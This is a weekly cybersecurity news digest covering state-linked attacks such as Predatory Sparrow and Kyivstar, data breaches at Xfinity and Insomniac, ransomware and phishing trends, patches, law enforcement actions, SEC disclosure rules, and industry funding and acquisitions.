At a glance.
- Predatory Sparrow and Iran's gas stations.
- Iran's Seedworm and its telco targets.
- Kyivstar's recovery from cyberattack.
- Ukrainian reprisals for Russia's Kyivstar attack.
- CitrixBleed exploit at Xfinity.
- Remote encryption of ransomware.
- Web-injection malware attacks on banks.
- Agent Tesla is spreading through an old vulnerability.
- Cyberattack on Insomniac Games.
- AI-generated email attacks.
- Malware increasingly uses public infrastructure.
- QR code scams.
Predatory Sparrow and Iran's gas stations.
On Monday of this week, according to the AP, about seventy percent of Iran's gasoline stations went out of operation due to what Iranian media at first described as a "software problem." Reuters subsequently reported that Iran's Oil Minister Javad Owji attributed the outages to a cyberattack. Iranian media attributed the attack to Predatory Sparrow, a group Iran attributes to Israel (and about which Israel had no comment). Like the CyberAv3ngers, Predatory Sparrow has a history in the region. The disruptions appear to have affected gas station point-of-sale systems, the Times of Israel reports. Predatory Sparrow claims to have accessed "the payment systems of the impacted gas stations, as well as each station’s central server and management system." For more on cyber operations connected with the Hamas-Israel war, see CyberWire Pro.
Iran's Seedworm and its telco targets.
Researchers at Symantec (part of Broadcom) warn that the Iranian cyberespionage group Seedworm (also known as “MuddyWater”) is targeting telecommunications organizations in Egypt, Sudan, and Tanzania: “Seedworm has long had an interest in telecommunications organizations, as do many groups engaged in cyberespionage activities. However, its strong focus on African organizations in this campaign is notable as, while it has been known to target organizations in Africa in the past, it does generally primarily focus on organizations in countries in the Middle East. That one of the victim organizations in this campaign is based in Egypt is also of note given Egypt’s proximity to Israel, a frequent target of Seedworm.”
Kyivstar's recovery from cyberattack.
The Kyiv Post reports that Kyivstar has fully restored its services, quoting the telco as saying, “The company’s specialists worked non-stop to swiftly restore subscribers’ ability to use all communication services throughout Ukraine and abroad after the largest hacker attack in the history of the global telecommunications market.” An analysis by the Atlantic Council considers the possibility that the attack on Kyivstar--a rare, large-scale success in the cyber phase of the hybrid war, and the most consequential Russian cyberattack since the takedown of Viasat ground stations in the hours after the invasion--may foreshadow an intensification of Russian efforts. Ukrainian defenses have proven formidable, but it would be unwise to conclude that Russian offensive capabilities might not respond by evolving into more effective forms.
Ukrainian reprisals for Russia's Kyivstar attack.
Ukrainian hacktivist auxiliaries claimed two reprisals for Russia's disruption of the Kyivstar telephone and Internet service.
The BLACKJACK group claimed, RBC-Ukraine reports, to have breached Russia's Rosvodokanal privately-owned water utility. RBC-Ukraine says the cyberattack was conducted with the support of Ukraine's SSU. The attack hit the utility's IT systems rather than its control systems, but BLACKJACK claims it disrupted operations nonetheless, specifically by accessing a large number of "documents," encrypting data on more than sx-thousand computers, and deleting more than fifty terabytes of data "including internal document circulation, corporate mail, cybersecurity services, backups, etc."
Another cyberattack, according to Ukrainska Pravda, sought to inflict damage on Bitrix24, an IT service provider whose customer relations management (CRM) systems are used by many large Russian companies. The effects of the attack may extend beyond Russia proper to the Commonwealth of Independent States. The disruption of CRM services seems to be particularly serious, at least in the hacktivist auxiliary's reckoning. The IT Army of Ukraine claimed credit for the attack in a Telegram post claiming credit for the attack.
The CyberWire's continuing coverage of Russia's war against Ukraine, with special attention to the cyber phases of that war, may be found here.
CitrixBleed exploit at Xfinity.
In a media release issued Monday afternoon, Comcast's Xfinity unit issued a "Notice To Customers of Data Security Incident." In a notification filed with the Maine Attorney General Comcast put the number of affected individuals at 35,879,455. The compromised data for those customers who are affected include usernames and hashed passwords. Some of those customers may also have suffered exposure of names, contact information, the last four digits of Social Security Numbers, dates of birth, "secret questions" and the answers thereto. The notifications advise the recipients to to reset their passwords and enable multifactor authentication.
Comcast hasn't received a ransom demand, nor has it seen any evidence of stolen data being exploited. “We are not aware of any customer data being leaked anywhere, nor of any attacks on our customers,” a company spokesman told TechCrunch. Comcast continues to investigate, and is working with appropriate law enforcement agencies. Neil Begley, Senior Vice President for Moody’s Investors Service, has offered an assessment of Comcast's breach. “Comcast’s announced cybersecurity breach is credit negative. Though cyber incidents have become more common, there remains risk as it could adversely impact customer behavior, cause churn to spike, and/or attract the scrutiny of the FCC and other regulators. Cyber incidents in the telecoms industry have been rising, raising questions about the industry’s cyber risk governance and defenses, as well as the overall exposure profile.”
CitrixBleed is a software supply chain vulnerability, now patched, that has been exploited in attacks against Boeing, the Industrial and Commercial Bank of China, Toyota, and other targets. For more on the Comcast incident, see CyberWire Pro.
Remote encryption of ransomware.
Researchers at Sophos warn that several high-profile ransomware groups, including Akira, ALPHV/BlackCat, LockBit, Royal, and Black Basta, are utilizing remote encryption in their attacks: “In remote encryption attacks, also known as remote ransomware, adversaries leverage a compromised and often underprotected endpoint to encrypt data on other devices connected to the same network.”
Web-injection malware attacks on banks.
Researchers at IBM earlier this year discovered a malware campaign that’s using JavaScript web injections to target banking applications: “Since the beginning of 2023, we have seen over 50,000 infected user sessions where these injections were used by attackers, indicating the scale of threat activity, across more than 40 banks that were affected by this malware campaign across North America, South America, Europe, and Japan.”
Agent Tesla is spreading through an old vulnerability.
Zscaler warns that threat actors are exploiting CVE-2017-11882, a dated remote code execution flaw affecting the Equation Editor of Microsoft Office, to deliver the Agent Tesla keylogger. The attackers are distributing malicious documents via phishing emails: “To make these spam emails seem legitimate, threat actors use words like ‘invoices’ and ‘order’ in the emails. This strategy lends authenticity to fraudulent emails and encourages users to download attachments. Once a user downloads a malicious attachment and opens it, if their version of Microsoft Excel is vulnerable, the Excel file initiates communication with a malicious destination and proceeds to download additional files without requiring any further user interaction.”
Cyberattack on Insomniac Games.
Sony developer Insomniac Games sustained a massive data breach after it refused to pay a $2 million ransom to the Rhysida ransomware group, the Verge reports. The hackers published 1.67 terabytes of stolen data, including information and gameplay from the company’s upcoming Wolverine game, as well as data from several unannounced games. The leak also includes a great deal of personal information from thousands of current and former Insomniac employees. Jonathan Weissman, a principal lecturer at Rochester Institute of Technology’s Department of Cybersecurity, told Polygon, “We’re talking about non-disclosure agreements with major companies and studios, internal developer Slack communications, internal HR documents, scanned employee passports, and more.” For more on the cyberattack, including comments from industry experts, see CyberWire Pro.
AI-generated email attacks.
Abnormal Security describes several AI-generated phishing emails, noting that “[b]ecause these emails are often sent from a legitimate email service provider, are text-based, and rely on social engineering to compel the recipient to take action, it is challenging for traditional email security solutions to detect them as attacks.” In the attacks observed by Abnormal, scammers impersonated Netflix, an insurance company, and Australian cosmetics company LYCON.
Malware increasingly uses public infrastructure.
Researchers at ReversingLabs warn that two malware campaigns are using previously unobserved techniques to abuse GitHub. The first used GitHub Gists to host second-stage malware payloads: “In this incident, several PyPI packages presented themselves as libraries for handling network proxying, and contained a Base64 encoded string, allegedly related to telemetry data, but actually containing a URL pointing to a secret Gist.” A second malware campaign, probably launched by the same threat actor, used git commit messages to issue malware commands.
QR code scams.
Netcraft describes a recent phishing attack that used a phony multifactor authentication notification in an attempt to trick recipients into scanning a QR code. The notification purported to come from Microsoft, and the QR code led to a credential-harvesting site: “It’s worth noting that the criminal’s deception includes a reference to 2FA (two-factor authentication). Setting up 2FA is associated with improving online security, and a task that is commonly legitimately completed using QR codes. The QR code directs the user to a phishing site that tricks the victim into entering their Microsoft login and password.”
Patch news.
CISA issued nine Industrial Control System Advisories:
On Tuesday Apple patched Safari, iOS, iPadOS, and macOS Sonoma.
On Wednesday Google issued an emergency patch for a Chrome vulnerability undergoing active exploitation in the wild.
Mozilla released security upgrades for Firefox and Thunderbird this week.
ESET fixed a vulnerability in its SSL/TLS protocol scanning feature. The company lists the affected products as:
- ESET NOD32 Antivirus, ESET Internet Security, ESET Smart Security Premium, ESET Security Ultimate
- ESET Endpoint Antivirus for Windows and ESET Endpoint Security for Windows
- ESET Endpoint Antivirus for Linux 10.0 and above
- ESET Server Security for Windows Server (File Security for Microsoft Windows Server), ESET Mail Security for Microsoft Exchange Server, ESET Mail Security for IBM Domino, ESET Security for Microsoft SharePoint Server, ESET File Security for Microsoft Azure
- ESET Server Security for Linux 10.1 and above
Crime and punishment.
The rumored takedown of a leaksite maintained by the ALPHV/BlackCat ransomware operation was confirmed. The US Department of Justice this morning announced that it had indeed taken part in an international action against the ransomware-as-a-service gang. The FBI has developed a decryption tool that it's already provided to more than five-hundred victims of the gang, and the Department of Justice encourages other victims to come forward for assistance. For more on the takedown, see CyberWire Pro.
The Cyber Express reports that ALPHV and LockBit announced late this week their intention to form a ransomware cartel. It's a gesture toward honor among thieves, and a gesture toward some prospect of continued criminal survival. “The FBI doesn’t catch us alone; it joins forces with all the special services in the world; we have to do the same,” LockBit said, and its former criminal rivals in ALPHV responded, “LockBit’s right, we should all join a cartel or they’ll hunt us down one by one.” Whether numbers will bring strength or simply present a larger, more consolidated target to law enforcement is unclear.
The case of Qakbot shows how ephemeral law enforcement takedowns of infrastructure can be. The Register, citing multiple sources, reports that Qakbot has returned three months after it sustained Operation Duck Hunt, albeit with a lower volume of mischief than it showed during its good days. Operation Duck Hunt was an FBI-led action similar in scope to the ALPHV/BlackCat takedown.
Courts and torts.
The US Securities and Exchange Commission's (SEC) disclosure rules went into effect Monday. on December 18. Companies can apply for delays to the FBI, and the Bureau has released guidelines outlining the delay request procedures and determination process. There has been much debate over the issue of determining the materiality of a cyberincident, and the FBI’s guidelines state in order to avoid immediate denial, any delay request must be submitted concurrently with a materiality determination.
The Record notes that industry response to the reporting rules has been less than positive, and Republican lawmakers have proposed legislation to reverse them altogether. One argument is that disclosure could put organizations in harm’s way. But as one senior official at the Cybersecurity and Infrastructure Security Agency (CISA) explains, many experts feel the benefits outweigh the potential dangers. “We know that there is ubiquitous underreporting of cybersecurity incidents, and that diminishes our ability to help victims, our ability to provide effective guidance, our ability to understand adversary trends and drive broader risk reduction at scale,” the CISA official stated.
Policies, procurements, and agency equities.
The International Committee of the Red Cross (ICRC) has called upon states to take two measures that would bring cyber warfare into line with international norms of arms conflict. First, it asked that states observe proper discrimination in their cyber operations, and avoid hitting protected targets, and civilian targets generally. The prohibited targets specifically named are hospitals, power grids, and "data collected by humanitarian organizations and used exclusively for humanitarian ends." Second, it asked that governments control and restrain the participation of civilians--"individuals, hacker groups, and companies"--in cyber warfare. Such participation, the ICRC fears, will blur the vital distinction between combatants and noncombatants, and expose prohibited targets to greater risk of attack.
Acting in accordance with NCSC recommendations, Britain's National Grid has begun pulling components supplied by Chinese-controlled Nari Technology from its electrical power transmission network, the Financial Times reports. The removal of Nari products is motivated by concerns over the cybersecurity risk Chinese-manufactured components carry.
Twenty-one members of the US House of Representatives have submitted a letter to President Joe Biden claiming that the EU’s Digital Markets Act (DMA) unfairly targets US firms over Chinese and European companies. As Reuters explains, the DMA designates American Big Tech firms Alphabet, Amazon, Apple, Meta, and Microsoft as "gatekeeper" service providers. As of March 2024, these companies will be mandated to make their messaging apps compatible with their competition and allow users to have the final say on which apps will come pre-installed on their devices. In the letter, the bipartisan group of lawmakers say that the new law will negatively impact the US economy and customer security, and they’re urging Biden to make the EU pledge the rules will be fairly implemented.
Fortunes of commerce.
Colorado-based apparel company VF Corporation (owner of Vans, North Face, and other major brands) reported a material cyberattack to the SEC on the first day the rules went into effect, the Record reports. VF stated, "The threat actor disrupted the Company’s business operations by encrypting some IT systems, and stole data from the Company, including personal data. The Company is working to bring the impacted portions of its IT systems back online and implement workarounds for certain offline operations with the aim of reducing disruption to its ability to serve its retail and brand e-commerce consumers and wholesale customers."
Mergers and acquisitions.
Identity and access management provider Okta is acquiring Israeli identity security posture management platform provider Spera for approximately $100 million, Calcalist reports.
Accenture has acquired UK-headquartered data consultancy Redkite.
London-based identity and access management firm Xalient has acquired digital identity advisory and managed services provider Grabowsky.
Reuters reports that Airbus is in talks to buy Atos's cybersecurity business BDS. Airbus and Atos declined to comment.
Investments and exits.
Boston-based cyber range provider SimSpace has secured $45 million in an equity raise led by L2 Point Management.
Anti-ransomware endpoint protection firm Halcyon has raised $40 million in a Series B round led by Bain Capital Ventures.
Origin AI, a Maryland-based startup that uses WiFi signals for motion sensing, has raised $15.9 million in a Series B extension led by Verisure, with participation from Okinawa Electric Power Company, Verizon Ventures, and INSPiRE.
Maryland-headquartered Turngate, a company that "offer[s] IT and cybersecurity professionals unprecedented insights into user activity," has secured $5 million in a seed funding round led by Paladin Capital Group.
And security innovation.
The US Cybersecurity and Infrastructure Security Agency (CISA) has issued an alert urging technology manufacturers to eliminate default passwords in their products. The agency recommends the following alternatives to default passwords:
- “Provide instance-unique setup passwords with the product;
- “Provide time-limited setup passwords that disable themselves when a setup process is complete and require activation of more secure authentication approaches, such as phishing-resistant MFA;
- “Require physical access for initial setup and the specification of instance-unique credentials.”
CISA has also published a detailed Cybersecurity Advisory outlining the results of a risk and vulnerability assessment the agency conducted for a healthcare and public health organization in January 2023. CISA says, “As part of the RVA, the CISA assessment team conducted web application, phishing, penetration, database, and wireless assessments. The assessed organization was a large organization deploying on-premises software.”
And CISA has updated its approach to information sharing through its Automated Indicator Sharing (AIS) program. In 2024 the agency will focus on "simplification," "partner-centered design," and “learning from experience."